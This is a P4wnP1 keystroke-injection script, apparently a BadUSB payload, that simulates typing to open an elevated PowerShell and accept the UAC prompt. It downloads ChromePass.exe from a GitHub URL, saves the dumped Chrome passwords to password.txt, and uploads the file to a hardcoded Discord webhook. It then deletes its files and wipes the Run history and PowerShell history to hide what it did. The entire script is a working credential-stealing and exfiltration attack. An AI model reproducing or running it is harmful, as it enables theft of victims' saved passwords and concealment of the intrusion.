layout("US");
press("GUI R");
delay(500);
type("powershell");
delay(500);
press("CTRL SHIFT ENTER");
delay(1000);
press("ALT Y");
delay(1000);
type("$Url = \"https://github.com/wisnusaputra56/tugasakhir/raw/main/ChromePass.exe\"; $downloadDir = \"C:\\Users\\Public\\Downloads\"; $File = \"ChromePass.exe\"; Invoke-WebRequest -Uri $Url -OutFile \"$downloadDir\\$File\"; cd $downloadDir ; Start-Process $file -WindowStyle Maximized");
press("ENTER");
delay(5000);
press("CTRL A");
delay(500);
press("CTRL S");
delay(500);
press("SHIFT TAB");
delay(500);
press("SHIFT TAB");
delay(500);
press("SHIFT TAB");
delay(500);
press("SHIFT TAB");
delay(500);
press("SHIFT TAB");
delay(500);
press("SHIFT TAB");
delay(500);
press("ENTER");
delay(500);
type("C:\\Users\\Public\\Downloads ");
press("ENTER");
delay(500);
press("TAB");
delay(500);
press("TAB");
delay(500);
press("TAB");
delay(500);
press("TAB");
delay(500);
press("TAB");
delay(500);
press("TAB");
delay(500);
press("ENTER");
delay(500);
type("password.txt");
press("ENTER");
delay(500);
press("ALT F4");
delay(500);
press("GUI R");
delay(500);
type("powershell");
delay(500);
press("CTRL SHIFT ENTER");
delay(1000);
press("ALT Y");
delay(1000);
type("PowerShell.exe -WindowStyle hidden $url=\"https://discordapp.com/api/webhooks/1080051025437798500/vWacPmGZLEDCyler5q8iHxWBHwxiqJpqzfq8XLdBeR8ErIV98A6Lq4bK4OKPR_Cgay0F\"; $Body = @{content = \"Hasil ChromePass Target $env:computername dari P4wnP1\"};  $fileUrl = \"C:\\Users\\Public\\Downloads\\password.txt\" ; $filechrome = \"C:\\Users\\Public\\Downloads\\ChromePass.exe\" ; curl.exe -F \"file1=@$fileUrl\" $url; Remove-Item $fileURL;  Remove-Item $filechrome ; reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f ; Remove-Item (Get-PSreadlineOption).HistorySavePath; exit");
press("ENTER");
delay(500);
